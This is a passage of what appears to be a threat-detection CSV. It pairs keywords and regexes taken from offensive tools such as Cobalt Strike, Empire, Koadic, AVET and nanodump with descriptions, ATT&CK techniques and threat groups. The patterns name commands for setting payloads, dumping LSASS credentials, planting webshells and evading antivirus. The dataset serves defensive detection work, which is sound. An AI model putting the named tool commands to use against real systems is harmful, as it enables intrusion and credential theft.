T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set LFILE /*",".{0,1000}set\sLFILE\s\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Set Listener dbx*",".{0,1000}Set\sListener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*set Listener onedrive*",".{0,1000}set\sListener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*set obfuscate *",".{0,1000}set\sobfuscate\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set payload *",".{0,1000}set\spayload\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set PAYLOAD *",".{0,1000}set\sPAYLOAD\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*set pipename *",".{0,1000}set\spipename\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set Profile apt1.profile*",".{0,1000}set\sProfile\sapt1\.profile.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*set shellcode *",".{0,1000}set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*set smartinject*",".{0,1000}set\ssmartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*Set the correct channel name using """"pscmdchannel"""" command*",".{0,1000}Set\sthe\scorrect\schannel\sname\susing\s\""pscmdchannel\""\scommand.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*set userwx*",".{0,1000}set\suserwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set zombie *",".{0,1000}set\szombie\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set_child werfault.exe*",".{0,1000}set_child\swerfault\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set_command_exec exec_via_cmd*",".{0,1000}set_command_exec\sexec_via_cmd.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_command_exec exec_via_powershell*",".{0,1000}set_command_exec\sexec_via_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_command_exec no_command*",".{0,1000}set_command_exec\sno_command.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_command_source download_bitsadmin*",".{0,1000}set_command_source\sdownload_bitsadmin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_decoder xor*",".{0,1000}set_decoder\sxor.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_empty_pw.py*",".{0,1000}set_empty_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","7","600","145","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*set_injection_technique*",".{0,1000}set_injection_technique.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*set_logon_script.py*",".{0,1000}set_logon_script\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*set_objectpipe \\*",".{0,1000}set_objectpipe\s\\\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set_payload_execution_method exec_shellcode64*",".{0,1000}set_payload_execution_method\sexec_shellcode64.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_payload_execution_method inject_dll*",".{0,1000}set_payload_execution_method\sinject_dll.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_payload_info_source from_command_line_raw*",".{0,1000}set_payload_info_source\sfrom_command_line_raw.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_payload_source download_powershell*",".{0,1000}set_payload_source\sdownload_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_rpc_callstack*",".{0,1000}set_rpc_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*set_shellcode",".{0,1000}set_shellcode","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*set_svchost_callstack*",".{0,1000}set_svchost_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*set_wmi_callstack*",".{0,1000}set_wmi_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*set_wmiconfig \*",".{0,1000}set_wmiconfig\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*setc_webshell*",".{0,1000}setc_webshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*setdes linux x64 blahblahblah*",".{0,1000}setdes\slinux\sx64\sblahblahblah.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Set-DesktopACLToAllow*",".{0,1000}Set\-DesktopACLToAllow.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 